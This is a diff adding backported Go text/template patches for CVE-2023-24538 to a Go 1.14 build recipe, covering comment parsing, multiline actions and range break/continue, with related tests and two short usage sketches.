+-func lex(name, input, left, right string) *lexer {
++func lex(name, input, left, right string, emitComment bool) *lexer {
+ if left == "" {
+ left = leftDelim
+ }
+@@ -216,6 +218,7 @@ func lex(name, input, left, right string) *lexer {
+ leftDelim: left,
+ rightDelim: right,
+ trimRightDelim: rightTrimMarker + right,
++ emitComment: emitComment,
+ items: make(chan item),
+ line: 1,
+ startLine: 1,
+@@ -323,6 +326,9 @@ func lexComment(l *lexer) stateFn {
+ if !delim {
+ return l.errorf("comment ends before closing delimiter")
+ }
++ if l.emitComment {
++ l.emit(itemComment)
++ }
+ if trimSpace {
+ l.pos += trimMarkerLen
+ }
+diff --git a/src/text/template/parse/lex_test.go b/src/text/template/parse/lex_test.go
+index 563c4fc..f6d5f28 100644
+--- a/src/text/template/parse/lex_test.go
++++ b/src/text/template/parse/lex_test.go
+@@ -15,6 +15,7 @@ var itemName = map[itemType]string{
+ itemBool: "bool",
+ itemChar: "char",
+ itemCharConstant: "charconst",
++ itemComment: "comment",
+ itemComplex: "complex",
+ itemDeclare: ":=",
+ itemEOF: "EOF",
+@@ -90,6 +91,7 @@ var lexTests = []lexTest{
+ {"text", `now is the time`, []item{mkItem(itemText, "now is the time"), tEOF}},
+ {"text with comment", "hello-{{/* this is a comment */}}-world", []item{
+ mkItem(itemText, "hello-"),
++ mkItem(itemComment, "/* this is a comment */"),
+ mkItem(itemText, "-world"),
+ tEOF,
+ }},
+@@ -311,6 +313,7 @@ var lexTests = []lexTest{
+ }},
+ {"trimming spaces before and after comment", "hello- {{- /* hello */ -}} -world", []item{
+ mkItem(itemText, "hello-"),
++ mkItem(itemComment, "/* hello */"),
+ mkItem(itemText, "-world"),
+ tEOF,
+ }},
+@@ -389,7 +392,7 @@ var lexTests = []lexTest{
+
+ // collect gathers the emitted items into a slice.
+ func collect(t *lexTest, left, right string) (items []item) {
+- l := lex(t.name, t.input, left, right)
++ l := lex(t.name, t.input, left, right, true)
+ for {
+ item := l.nextItem()
+ items = append(items, item)
+@@ -529,7 +532,7 @@ func TestPos(t *testing.T) {
+ func TestShutdown(t *testing.T) {
+ // We need to duplicate template.Parse here to hold on to the lexer.
+ const text = "erroneous{{define}}{{else}}1234"
+- lexer := lex("foo", text, "{{", "}}")
++ lexer := lex("foo", text, "{{", "}}", false)
+ _, err := New("root").parseLexer(lexer)
+ if err == nil {
+ t.Fatalf("expected error")
+diff --git a/src/text/template/parse/node.go b/src/text/template/parse/node.go
+index 1c116ea..a9dad5e 100644
+--- a/src/text/template/parse/node.go
++++ b/src/text/template/parse/node.go
+@@ -70,6 +70,7 @@ const (
+ NodeTemplate // A template invocation action.
+ NodeVariable // A $ variable.
+ NodeWith // A with action.
++ NodeComment // A comment.
+ )
+
+ // Nodes.
+@@ -149,6 +150,38 @@ func (t *TextNode) Copy() Node {
+ return &TextNode{tr: t.tr, NodeType: NodeText, Pos: t.Pos, Text: append([]byte{}, t.Text...)}
+ }
+
++// CommentNode holds a comment.
++type CommentNode struct {
++ NodeType
++ Pos
++ tr *Tree
++ Text string // Comment text.
++}
++
++func (t *Tree) newComment(pos Pos, text string) *CommentNode {
++ return &CommentNode{tr: t, NodeType: NodeComment, Pos: pos, Text: text}
++}
++
++func (c *CommentNode) String() string {
++ var sb strings.Builder
++ c.writeTo(&sb)
++ return sb.String()
++}
++
++func (c *CommentNode) writeTo(sb *strings.Builder) {
++ sb.WriteString("{{")
++ sb.WriteString(c.Text)
++ sb.WriteString("}}")
++}
++
++func (c *CommentNode) tree() *Tree {
++ return c.tr
++}
++
++func (c *CommentNode) Copy() Node {
++ return &CommentNode{tr: c.tr, NodeType: NodeComment, Pos: c.Pos, Text: c.Text}
++}
++
+ // PipeNode holds a pipeline with optional declaration
+ type PipeNode struct {
+ NodeType
+diff --git a/src/text/template/parse/parse.go b/src/text/template/parse/parse.go
+index c9b80f4..496d8bf 100644
+--- a/src/text/template/parse/parse.go
++++ b/src/text/template/parse/parse.go
+@@ -21,6 +21,7 @@ type Tree struct {
+ Name string // name of the template represented by the tree.
+ ParseName string // name of the top-level template during parsing, for error messages.
+ Root *ListNode // top-level root of the tree.
++ Mode Mode // parsing mode.
+ text string // text parsed to create the template (or its parent)
+ // Parsing only; cleared after parse.
+ funcs []map[string]interface{}
+@@ -29,8 +30,16 @@ type Tree struct {
+ peekCount int
+ vars []string // variables defined at the moment.
+ treeSet map[string]*Tree
++ mode Mode
+ }
+
++// A mode value is a set of flags (or 0). Modes control parser behavior.
++type Mode uint
++
++const (
++ ParseComments Mode = 1 << iota // parse comments and add them to AST
++)
++
+ // Copy returns a copy of the Tree. Any parsing state is discarded.
+ func (t *Tree) Copy() *Tree {
+ if t == nil {
+@@ -220,7 +229,8 @@ func (t *Tree) stopParse() {
+ func (t *Tree) Parse(text, leftDelim, rightDelim string, treeSet map[string]*Tree, funcs ...map[string]interface{}) (tree *Tree, err error) {
+ defer t.recover(&err)
+ t.ParseName = t.Name
+- t.startParse(funcs, lex(t.Name, text, leftDelim, rightDelim), treeSet)
++ emitComment := t.Mode&ParseComments != 0
++ t.startParse(funcs, lex(t.Name, text, leftDelim, rightDelim, emitComment), treeSet)
+ t.text = text
+ t.parse()
+ t.add()
+@@ -240,12 +250,14 @@ func (t *Tree) add() {
+ }
+ }
+
+-// IsEmptyTree reports whether this tree (node) is empty of everything but space.
++// IsEmptyTree reports whether this tree (node) is empty of everything but space or comments.
+ func IsEmptyTree(n Node) bool {
+ switch n := n.(type) {
+ case nil:
+ return true
+ case *ActionNode:
++ case *CommentNode:
++ return true
+ case *IfNode:
+ case *ListNode:
+ for _, node := range n.Nodes {
+@@ -276,6 +288,7 @@ func (t *Tree) parse() {
+ if t.nextNonSpace().typ == itemDefine {
+ newT := New("definition") // name will be updated once we know it.
+ newT.text = t.text
++ newT.Mode = t.Mode
+ newT.ParseName = t.ParseName
+ newT.startParse(t.funcs, t.lex, t.treeSet)
+ newT.parseDefinition()
+@@ -331,13 +344,15 @@ func (t *Tree) itemList() (list *ListNode, next Node) {
+ }
+
+ // textOrAction:
+-// text | action
++// text | comment | action
+ func (t *Tree) textOrAction() Node {
+ switch token := t.nextNonSpace(); token.typ {
+ case itemText:
+ return t.newText(token.pos, token.val)
+ case itemLeftDelim:
+ return t.action()
++ case itemComment:
++ return t.newComment(token.pos, token.val)
+ default:
+ t.unexpected(token, "input")
+ }
+@@ -539,6 +554,7 @@ func (t *Tree) blockControl() Node {
+
+ block := New(name) // name will be updated once we know it.
+ block.text = t.text
++ block.Mode = t.Mode
+ block.ParseName = t.ParseName
+ block.startParse(t.funcs, t.lex, t.treeSet)
+ var end Node
+diff --git a/src/text/template/parse/parse_test.go b/src/text/template/parse/parse_test.go
+index 4e09a78..d9c13c5 100644
+--- a/src/text/template/parse/parse_test.go
++++ b/src/text/template/parse/parse_test.go
+@@ -348,6 +348,30 @@ func TestParseCopy(t *testing.T) {
+ testParse(true, t)
+ }
+
++func TestParseWithComments(t *testing.T) {
++ textFormat = "%q"
++ defer func() { textFormat = "%s" }()
++ tests := [...]parseTest{
++ {"comment", "{{/*\n\n\n*/}}", noError, "{{/*\n\n\n*/}}"},
++ {"comment trim left", "x \r\n\t{{- /* hi */}}", noError, `"x"{{/* hi */}}`},
++ {"comment trim right", "{{/* hi */ -}}\n\n\ty", noError, `{{/* hi */}}"y"`},
++ {"comment trim left and right", "x \r\n\t{{- /* */ -}}\n\n\ty", noError, `"x"{{/* */}}"y"`},
++ }
++ for _, test := range tests {
++ t.Run(test.name, func(t *testing.T) {
++ tr := New(test.name)
++ tr.Mode = ParseComments
++ tmpl, err := tr.Parse(test.input, "", "", make(map[string]*Tree))
++ if err != nil {
++ t.Errorf("%q: expected error; got none", test.name)
++ }
++ if result := tmpl.Root.String(); result != test.result {
++ t.Errorf("%s=(%q): got\n\t%v\nexpected\n\t%v", test.name, test.input, result, test.result)
++ }
++ })
++ }
++}
++
+ type isEmptyTest struct {
+ name string
+ input string
+@@ -358,6 +382,7 @@ var isEmptyTests = []isEmptyTest{
+ {"empty", ``, true},
+ {"nonempty", `hello`, false},
+ {"spaces only", " \t\n \t\n", true},
++ {"comment only", "{{/* comment */}}", true},
+ {"definition", `{{define "x"}}something{{end}}`, true},
+ {"definitions and space", "{{define `x`}}something{{end}}\n\n{{define `y`}}something{{end}}\n\n", true},
+ {"definitions and text", "{{define `x`}}something{{end}}\nx\n{{define `y`}}something{{end}}\ny\n", false},
+--
+2.7.4
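A small usage sketch of the mode introduced above (not part of the patch; the template string is invented for illustration): with Tree.Mode set to ParseComments, comments survive parsing as *parse.CommentNode instead of being dropped.

    // Illustrative sketch only; assumes the backported ParseComments mode.
    package main

    import (
        "fmt"
        "text/template/parse"
    )

    func main() {
        tr := parse.New("root")
        tr.Mode = parse.ParseComments
        tree, err := tr.Parse("{{/* a comment */}}Hello, world", "", "", make(map[string]*parse.Tree))
        if err != nil {
            panic(err)
        }
        for _, n := range tree.Root.Nodes {
            if c, ok := n.(*parse.CommentNode); ok {
                fmt.Printf("kept comment: %q\n", c.Text) // "/* a comment */"
            }
        }
    }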
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch
new file mode 100644
index 0000000000..d5e2eb6684
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch
@@ -0,0 +1,497 @@
+From 760d88497091fb5d6d231a18e6f4e06ecb9af9b2 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Thu, 10 Sep 2020 18:53:26 -0400
+Subject: [PATCH 4/6] text/template: allow newlines inside action delimiters
+
+This allows multiline constructs like:
+
+ {{"hello" |
+ printf}}
+
+Now that unclosed actions can span multiple lines,
+track and report the start of the action when reporting errors.
+
+Also clean up a few "unexpected <error message>" to be just "<error message>".
+
+Fixes #29770.
+
+Change-Id: I54c6c016029a8328b7902a4b6d85eab713ec3285
+Reviewed-on: https://go-review.googlesource.com/c/go/+/254257
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Rob Pike <r@golang.org>
+
+Dependency Patch #4
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/9384d34c58099657bb1b133beaf3ff37ada9b017
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/text/template/doc.go | 21 ++++-----
+ src/text/template/exec_test.go | 2 +-
+ src/text/template/parse/lex.go | 84 +++++++++++++++++------------------
+ src/text/template/parse/lex_test.go | 2 +-
+ src/text/template/parse/parse.go | 59 +++++++++++++-----------
+ src/text/template/parse/parse_test.go | 36 ++++++++++++---
+ 6 files changed, 117 insertions(+), 87 deletions(-)
+
+diff --git a/src/text/template/doc.go b/src/text/template/doc.go
+index 4b0efd2..7b30294 100644
+--- a/src/text/template/doc.go
++++ b/src/text/template/doc.go
+@@ -40,16 +40,17 @@ More intricate examples appear below.
+ Text and spaces
+
+ By default, all text between actions is copied verbatim when the template is
+-executed. For example, the string " items are made of " in the example above appears
+-on standard output when the program is run.
+-
+-However, to aid in formatting template source code, if an action's left delimiter
+-(by default "{{") is followed immediately by a minus sign and ASCII space character
+-("{{- "), all trailing white space is trimmed from the immediately preceding text.
+-Similarly, if the right delimiter ("}}") is preceded by a space and minus sign
+-(" -}}"), all leading white space is trimmed from the immediately following text.
+-In these trim markers, the ASCII space must be present; "{{-3}}" parses as an
+-action containing the number -3.
++executed. For example, the string " items are made of " in the example above
++appears on standard output when the program is run.
++
++However, to aid in formatting template source code, if an action's left
++delimiter (by default "{{") is followed immediately by a minus sign and white
++space, all trailing white space is trimmed from the immediately preceding text.
++Similarly, if the right delimiter ("}}") is preceded by white space and a minus
++sign, all leading white space is trimmed from the immediately following text.
++In these trim markers, the white space must be present:
++"{{- 3}}" is like "{{3}}" but trims the immediately preceding text, while
++"{{-3}}" parses as an action containing the number -3.
+
+ For instance, when executing the template whose source is
+
+diff --git a/src/text/template/exec_test.go b/src/text/template/exec_test.go
+index b8a809e..3309b33 100644
+--- a/src/text/template/exec_test.go
++++ b/src/text/template/exec_test.go
+@@ -1295,7 +1295,7 @@ func TestUnterminatedStringError(t *testing.T) {
+ t.Fatal("expected error")
+ }
+ str := err.Error()
+- if !strings.Contains(str, "X:3: unexpected unterminated raw quoted string") {
++ if !strings.Contains(str, "X:3: unterminated raw quoted string") {
+ t.Fatalf("unexpected error: %s", str)
+ }
+ }
+diff --git a/src/text/template/parse/lex.go b/src/text/template/parse/lex.go
+index e41373a..6784071 100644
+--- a/src/text/template/parse/lex.go
++++ b/src/text/template/parse/lex.go
+@@ -92,15 +92,14 @@ const eof = -1
+ // If the action begins "{{- " rather than "{{", then all space/tab/newlines
+ // preceding the action are trimmed; conversely if it ends " -}}" the
+ // leading spaces are trimmed. This is done entirely in the lexer; the
+-// parser never sees it happen. We require an ASCII space to be
+-// present to avoid ambiguity with things like "{{-3}}". It reads
++// parser never sees it happen. We require an ASCII space (' ', \t, \r, \n)
++// to be present to avoid ambiguity with things like "{{-3}}". It reads
+ // better with the space present anyway. For simplicity, only ASCII
+-// space does the job.
++// does the job.
+ const (
+- spaceChars = " \t\r\n" // These are the space characters defined by Go itself.
+- leftTrimMarker = "- " // Attached to left delimiter, trims trailing spaces from preceding text.
+- rightTrimMarker = " -" // Attached to right delimiter, trims leading spaces from following text.
+- trimMarkerLen = Pos(len(leftTrimMarker))
++ spaceChars = " \t\r\n" // These are the space characters defined by Go itself.
++ trimMarker = '-' // Attached to left/right delimiter, trims trailing spaces from preceding/following text.
++ trimMarkerLen = Pos(1 + 1) // marker plus space before or after
+ )
+
+ // stateFn represents the state of the scanner as a function that returns the next state.
+@@ -108,19 +107,18 @@ type stateFn func(*lexer) stateFn
+
+ // lexer holds the state of the scanner.
+ type lexer struct {
+- name string // the name of the input; used only for error reports
+- input string // the string being scanned
+- leftDelim string // start of action
+- rightDelim string // end of action
+- trimRightDelim string // end of action with trim marker
+- emitComment bool // emit itemComment tokens.
+- pos Pos // current position in the input
+- start Pos // start position of this item
+- width Pos // width of last rune read from input
+- items chan item // channel of scanned items
+- parenDepth int // nesting depth of ( ) exprs
+- line int // 1+number of newlines seen
+- startLine int // start line of this item
++ name string // the name of the input; used only for error reports
++ input string // the string being scanned
++ leftDelim string // start of action
++ rightDelim string // end of action
++ emitComment bool // emit itemComment tokens.
++ pos Pos // current position in the input
++ start Pos // start position of this item
++ width Pos // width of last rune read from input
++ items chan item // channel of scanned items
++ parenDepth int // nesting depth of ( ) exprs
++ line int // 1+number of newlines seen
++ startLine int // start line of this item
+ }
+
+ // next returns the next rune in the input.
+@@ -213,15 +211,14 @@ func lex(name, input, left, right string, emitComment bool) *lexer {
+ right = rightDelim
+ }
+ l := &lexer{
+- name: name,
+- input: input,
+- leftDelim: left,
+- rightDelim: right,
+- trimRightDelim: rightTrimMarker + right,
+- emitComment: emitComment,
+- items: make(chan item),
+- line: 1,
+- startLine: 1,
++ name: name,
++ input: input,
++ leftDelim: left,
++ rightDelim: right,
++ emitComment: emitComment,
++ items: make(chan item),
++ line: 1,
++ startLine: 1,
+ }
+ go l.run()
+ return l
+@@ -251,7 +248,7 @@ func lexText(l *lexer) stateFn {
+ ldn := Pos(len(l.leftDelim))
+ l.pos += Pos(x)
+ trimLength := Pos(0)
+- if strings.HasPrefix(l.input[l.pos+ldn:], leftTrimMarker) {
++ if hasLeftTrimMarker(l.input[l.pos+ldn:]) {
+ trimLength = rightTrimLength(l.input[l.start:l.pos])
+ }
+ l.pos -= trimLength
+@@ -280,7 +277,7 @@ func rightTrimLength(s string) Pos {
+
+ // atRightDelim reports whether the lexer is at a right delimiter, possibly preceded by a trim marker.
+ func (l *lexer) atRightDelim() (delim, trimSpaces bool) {
+- if strings.HasPrefix(l.input[l.pos:], l.trimRightDelim) { // With trim marker.
++ if hasRightTrimMarker(l.input[l.pos:]) && strings.HasPrefix(l.input[l.pos+trimMarkerLen:], l.rightDelim) { // With trim marker.
+ return true, true
+ }
+ if strings.HasPrefix(l.input[l.pos:], l.rightDelim) { // Without trim marker.
+@@ -297,7 +294,7 @@ func leftTrimLength(s string) Pos {
+ // lexLeftDelim scans the left delimiter, which is known to be present, possibly with a trim marker.
+ func lexLeftDelim(l *lexer) stateFn {
+ l.pos += Pos(len(l.leftDelim))
+- trimSpace := strings.HasPrefix(l.input[l.pos:], leftTrimMarker)
++ trimSpace := hasLeftTrimMarker(l.input[l.pos:])
+ afterMarker := Pos(0)
+ if trimSpace {
+ afterMarker = trimMarkerLen
+@@ -342,7 +339,7 @@ func lexComment(l *lexer) stateFn {
+
+ // lexRightDelim scans the right delimiter, which is known to be present, possibly with a trim marker.
+ func lexRightDelim(l *lexer) stateFn {
+- trimSpace := strings.HasPrefix(l.input[l.pos:], rightTrimMarker)
++ trimSpace := hasRightTrimMarker(l.input[l.pos:])
+ if trimSpace {
+ l.pos += trimMarkerLen
+ l.ignore()
+@@ -369,7 +366,7 @@ func lexInsideAction(l *lexer) stateFn {
+ return l.errorf("unclosed left paren")
+ }
+ switch r := l.next(); {
+- case r == eof || isEndOfLine(r):
++ case r == eof:
+ return l.errorf("unclosed action")
+ case isSpace(r):
+ l.backup() // Put space back in case we have " -}}".
+@@ -439,7 +436,7 @@ func lexSpace(l *lexer) stateFn {
+ }
+ // Be careful about a trim-marked closing delimiter, which has a minus
+ // after a space. We know there is a space, so check for the '-' that might follow.
+- if strings.HasPrefix(l.input[l.pos-1:], l.trimRightDelim) {
++ if hasRightTrimMarker(l.input[l.pos-1:]) && strings.HasPrefix(l.input[l.pos-1+trimMarkerLen:], l.rightDelim) {
+ l.backup() // Before the space.
+ if numSpaces == 1 {
+ return lexRightDelim // On the delim, so go right to that.
+@@ -526,7 +523,7 @@ func lexFieldOrVariable(l *lexer, typ itemType) stateFn {
+ // day to implement arithmetic.
+ func (l *lexer) atTerminator() bool {
+ r := l.peek()
+- if isSpace(r) || isEndOfLine(r) {
++ if isSpace(r) {
+ return true
+ }
+ switch r {
+@@ -657,15 +654,18 @@ Loop:
+
+ // isSpace reports whether r is a space character.
+ func isSpace(r rune) bool {
+- return r == ' ' || r == '\t'
+-}
+-
+-// isEndOfLine reports whether r is an end-of-line character.
+-func isEndOfLine(r rune) bool {
+- return r == '\r' || r == '\n'
++ return r == ' ' || r == '\t' || r == '\r' || r == '\n'
+ }
+
+ // isAlphaNumeric reports whether r is an alphabetic, digit, or underscore.
+ func isAlphaNumeric(r rune) bool {
+ return r == '_' || unicode.IsLetter(r) || unicode.IsDigit(r)
+ }
++
++func hasLeftTrimMarker(s string) bool {
++ return len(s) >= 2 && s[0] == trimMarker && isSpace(rune(s[1]))
++}
++
++func hasRightTrimMarker(s string) bool {
++ return len(s) >= 2 && isSpace(rune(s[0])) && s[1] == trimMarker
++}
+diff --git a/src/text/template/parse/lex_test.go b/src/text/template/parse/lex_test.go
+index f6d5f28..6510eed 100644
+--- a/src/text/template/parse/lex_test.go
++++ b/src/text/template/parse/lex_test.go
+@@ -323,7 +323,7 @@ var lexTests = []lexTest{
+ tLeft,
+ mkItem(itemError, "unrecognized character in action: U+0001"),
+ }},
+- {"unclosed action", "{{\n}}", []item{
++ {"unclosed action", "{{", []item{
+ tLeft,
+ mkItem(itemError, "unclosed action"),
+ }},
+diff --git a/src/text/template/parse/parse.go b/src/text/template/parse/parse.go
+index 496d8bf..5e6e512 100644
+--- a/src/text/template/parse/parse.go
++++ b/src/text/template/parse/parse.go
+@@ -24,13 +24,14 @@ type Tree struct {
+ Mode Mode // parsing mode.
+ text string // text parsed to create the template (or its parent)
+ // Parsing only; cleared after parse.
+- funcs []map[string]interface{}
+- lex *lexer
+- token [3]item // three-token lookahead for parser.
+- peekCount int
+- vars []string // variables defined at the moment.
+- treeSet map[string]*Tree
+- mode Mode
++ funcs []map[string]interface{}
++ lex *lexer
++ token [3]item // three-token lookahead for parser.
++ peekCount int
++ vars []string // variables defined at the moment.
++ treeSet map[string]*Tree
++ actionLine int // line of left delim starting action
++ mode Mode
+ }
+
+ // A mode value is a set of flags (or 0). Modes control parser behavior.
+@@ -187,6 +188,16 @@ func (t *Tree) expectOneOf(expected1, expected2 itemType, context string) item {
+
+ // unexpected complains about the token and terminates processing.
+ func (t *Tree) unexpected(token item, context string) {
++ if token.typ == itemError {
++ extra := ""
++ if t.actionLine != 0 && t.actionLine != token.line {
++ extra = fmt.Sprintf(" in action started at %s:%d", t.ParseName, t.actionLine)
++ if strings.HasSuffix(token.val, " action") {
++ extra = extra[len(" in action"):] // avoid "action in action"
++ }
++ }
++ t.errorf("%s%s", token, extra)
++ }
+ t.errorf("unexpected %s in %s", token, context)
+ }
+
+@@ -350,6 +361,8 @@ func (t *Tree) textOrAction() Node {
+ case itemText:
+ return t.newText(token.pos, token.val)
+ case itemLeftDelim:
++ t.actionLine = token.line
++ defer t.clearActionLine()
+ return t.action()
+ case itemComment:
+ return t.newComment(token.pos, token.val)
+@@ -359,6 +372,10 @@ func (t *Tree) textOrAction() Node {
+ return nil
+ }
+
++func (t *Tree) clearActionLine() {
++ t.actionLine = 0
++}
++
+ // Action:
+ // control
+ // command ("|" command)*
+@@ -384,12 +401,12 @@ func (t *Tree) action() (n Node) {
+ t.backup()
+ token := t.peek()
+ // Do not pop variables; they persist until "end".
+- return t.newAction(token.pos, token.line, t.pipeline("command"))
++ return t.newAction(token.pos, token.line, t.pipeline("command", itemRightDelim))
+ }
+
+ // Pipeline:
+ // declarations? command ('|' command)*
+-func (t *Tree) pipeline(context string) (pipe *PipeNode) {
++func (t *Tree) pipeline(context string, end itemType) (pipe *PipeNode) {
+ token := t.peekNonSpace()
+ pipe = t.newPipeline(token.pos, token.line, nil)
+ // Are there declarations or assignments?
+@@ -430,12 +447,9 @@ decls:
+ }
+ for {
+ switch token := t.nextNonSpace(); token.typ {
+- case itemRightDelim, itemRightParen:
++ case end:
+ // At this point, the pipeline is complete
+ t.checkPipeline(pipe, context)
+- if token.typ == itemRightParen {
+- t.backup()
+- }
+ return
+ case itemBool, itemCharConstant, itemComplex, itemDot, itemField, itemIdentifier,
+ itemNumber, itemNil, itemRawString, itemString, itemVariable, itemLeftParen:
+@@ -464,7 +478,7 @@ func (t *Tree) checkPipeline(pipe *PipeNode, context string) {
+
+ func (t *Tree) parseControl(allowElseIf bool, context string) (pos Pos, line int, pipe *PipeNode, list, elseList *ListNode) {
+ defer t.popVars(len(t.vars))
+- pipe = t.pipeline(context)
++ pipe = t.pipeline(context, itemRightDelim)
+ var next Node
+ list, next = t.itemList()
+ switch next.Type() {
+@@ -550,7 +564,7 @@ func (t *Tree) blockControl() Node {
+
+ token := t.nextNonSpace()
+ name := t.parseTemplateName(token, context)
+- pipe := t.pipeline(context)
++ pipe := t.pipeline(context, itemRightDelim)
+
+ block := New(name) // name will be updated once we know it.
+ block.text = t.text
+@@ -580,7 +594,7 @@ func (t *Tree) templateControl() Node {
+ if t.nextNonSpace().typ != itemRightDelim {
+ t.backup()
+ // Do not pop variables; they persist until "end".
+- pipe = t.pipeline(context)
++ pipe = t.pipeline(context, itemRightDelim)
+ }
+ return t.newTemplate(token.pos, token.line, name, pipe)
+ }
+@@ -614,13 +628,12 @@ func (t *Tree) command() *CommandNode {
+ switch token := t.next(); token.typ {
+ case itemSpace:
+ continue
+- case itemError:
+- t.errorf("%s", token.val)
+ case itemRightDelim, itemRightParen:
+ t.backup()
+ case itemPipe:
++ // nothing here; break loop below
+ default:
+- t.errorf("unexpected %s in operand", token)
++ t.unexpected(token, "operand")
+ }
+ break
+ }
+@@ -675,8 +688,6 @@ func (t *Tree) operand() Node {
+ // A nil return means the next item is not a term.
+ func (t *Tree) term() Node {
+ switch token := t.nextNonSpace(); token.typ {
+- case itemError:
+- t.errorf("%s", token.val)
+ case itemIdentifier:
+ if !t.hasFunction(token.val) {
+ t.errorf("function %q not defined", token.val)
+@@ -699,11 +710,7 @@ func (t *Tree) term() Node {
+ }
+ return number
+ case itemLeftParen:
+- pipe := t.pipeline("parenthesized pipeline")
+- if token := t.next(); token.typ != itemRightParen {
+- t.errorf("unclosed right paren: unexpected %s", token)
+- }
+- return pipe
++ return t.pipeline("parenthesized pipeline", itemRightParen)
+ case itemString, itemRawString:
+ s, err := strconv.Unquote(token.val)
+ if err != nil {
+diff --git a/src/text/template/parse/parse_test.go b/src/text/template/parse/parse_test.go
+index d9c13c5..220f984 100644
+--- a/src/text/template/parse/parse_test.go
++++ b/src/text/template/parse/parse_test.go
+@@ -250,6 +250,13 @@ var parseTests = []parseTest{
+ {"comment trim left and right", "x \r\n\t{{- /* */ -}}\n\n\ty", noError, `"x""y"`},
+ {"block definition", `{{block "foo" .}}hello{{end}}`, noError,
+ `{{template "foo" .}}`},
++
++ {"newline in assignment", "{{ $x \n := \n 1 \n }}", noError, "{{$x := 1}}"},
++ {"newline in empty action", "{{\n}}", hasError, "{{\n}}"},
++ {"newline in pipeline", "{{\n\"x\"\n|\nprintf\n}}", noError, `{{"x" | printf}}`},
++ {"newline in comment", "{{/*\nhello\n*/}}", noError, ""},
++ {"newline in comment", "{{-\n/*\nhello\n*/\n-}}", noError, ""},
++
+ // Errors.
+ {"unclosed action", "hello{{range", hasError, ""},
+ {"unmatched end", "{{end}}", hasError, ""},
+@@ -426,23 +433,38 @@ var errorTests = []parseTest{
+ // Check line numbers are accurate.
+ {"unclosed1",
+ "line1\n{{",
+- hasError, `unclosed1:2: unexpected unclosed action in command`},
++ hasError, `unclosed1:2: unclosed action`},
+ {"unclosed2",
+ "line1\n{{define `x`}}line2\n{{",
+- hasError, `unclosed2:3: unexpected unclosed action in command`},
++ hasError, `unclosed2:3: unclosed action`},
++ {"unclosed3",
++ "line1\n{{\"x\"\n\"y\"\n",
++ hasError, `unclosed3:4: unclosed action started at unclosed3:2`},
++ {"unclosed4",
++ "{{\n\n\n\n\n",
++ hasError, `unclosed4:6: unclosed action started at unclosed4:1`},
++ {"var1",
++ "line1\n{{\nx\n}}",
++ hasError, `var1:3: function "x" not defined`},
+ // Specific errors.
+ {"function",
+ "{{foo}}",
+ hasError, `function "foo" not defined`},
+- {"comment",
++ {"comment1",
+ "{{/*}}",
+- hasError, `unclosed comment`},
++ hasError, `comment1:1: unclosed comment`},
++ {"comment2",
++ "{{/*\nhello\n}}",
++ hasError, `comment2:1: unclosed comment`},
+ {"lparen",
+ "{{.X (1 2 3}}",
+ hasError, `unclosed left paren`},
+ {"rparen",
+- "{{.X 1 2 3)}}",
+- hasError, `unexpected ")"`},
++ "{{.X 1 2 3 ) }}",
++ hasError, `unexpected ")" in command`},
++ {"rparen2",
++ "{{(.X 1 2 3",
++ hasError, `unclosed action`},
+ {"space",
+ "{{`x`3}}",
+ hasError, `in operand`},
+@@ -488,7 +510,7 @@ var errorTests = []parseTest{
+ hasError, `missing value for parenthesized pipeline`},
+ {"multilinerawstring",
+ "{{ $v := `\n` }} {{",
+- hasError, `multilinerawstring:2: unexpected unclosed action`},
++ hasError, `multilinerawstring:2: unclosed action`},
+ {"rangeundefvar",
+ "{{range $k}}{{end}}",
+ hasError, `undefined variable`},
+--
+2.7.4
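Illustrative sketch (not part of the patch series): with the newline change in the patch above applied, a text/template action may span several lines, so a program like the following parses and prints "hello world". The template source is an assumed example, not taken from the patch.

    package main

    import (
            "os"
            "text/template"
    )

    func main() {
            // The pipeline inside {{ ... }} is spread across two lines,
            // which the pre-patch lexer rejected as an unclosed action.
            const src = "{{\"hello\" |\n printf \"%s world\"}}\n"
            tmpl := template.Must(template.New("demo").Parse(src))
            if err := tmpl.Execute(os.Stdout, nil); err != nil {
                    panic(err)
            }
    }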
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch
new file mode 100644
index 0000000000..fc38929648
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch
@@ -0,0 +1,585 @@
+From e0e6bca6ddc0e6d9fa3a5b644af9b446924fbf83 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Thu, 20 May 2021 12:46:33 -0400
+Subject: [PATCH 5/6] html/template, text/template: implement break and
+ continue for range loops
+
+Break and continue for range loops was accepted as a proposal in June 2017.
+It was implemented in CL 66410 (Oct 2017)
+but then rolled back in CL 92155 (Feb 2018)
+because html/template changes had not been implemented.
+
+This CL reimplements break and continue in text/template
+and then adds support for them in html/template as well.
+
+Fixes #20531.
+
+Change-Id: I05330482a976f1c078b4b49c2287bd9031bb7616
+Reviewed-on: https://go-review.googlesource.com/c/go/+/321491
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Rob Pike <r@golang.org>
+
+Dependency Patch #5
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/d0dd26a88c019d54f22463daae81e785f5867565
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/html/template/context.go | 4 ++
+ src/html/template/escape.go | 71 ++++++++++++++++++++++++++++++++++-
+ src/html/template/escape_test.go | 24 ++++++++++++
+ src/text/template/doc.go | 8 ++++
+ src/text/template/exec.go | 24 +++++++++++-
+ src/text/template/exec_test.go | 2 +
+ src/text/template/parse/lex.go | 13 ++++++-
+ src/text/template/parse/lex_test.go | 2 +
+ src/text/template/parse/node.go | 36 ++++++++++++++++++
+ src/text/template/parse/parse.go | 42 ++++++++++++++++++++-
+ src/text/template/parse/parse_test.go | 8 ++++
+ 11 files changed, 230 insertions(+), 4 deletions(-)
+
